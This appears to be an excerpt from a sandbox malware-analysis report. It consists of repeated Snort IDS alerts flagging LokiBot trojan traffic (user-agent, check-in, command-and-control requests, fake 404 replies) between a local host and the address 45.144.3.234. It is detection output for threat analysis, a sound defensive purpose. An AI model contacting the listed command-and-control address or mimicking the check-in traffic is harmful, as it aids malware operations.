                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49751
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49752 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49752
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49753 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49753
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49754 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49754
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49755 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49755
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49756 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49756
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49757 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49757
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49758 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49758
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49759 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49759
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49760 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49760
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49761 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49761
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49762 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49762
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49763 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49763
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49764 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49764
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49765 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49765
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49766 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49766
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49767 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49767
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49768 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49768
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49769
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49770
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49771
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49772
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49773
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49774
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49775
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49776
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49778 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49778
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49779
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49781
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49783
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49787
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49789
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49791
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49793
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49795
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49797
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49799
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49800
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49802
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49804
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49805
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49806
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49807
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 45.144.3.234:80
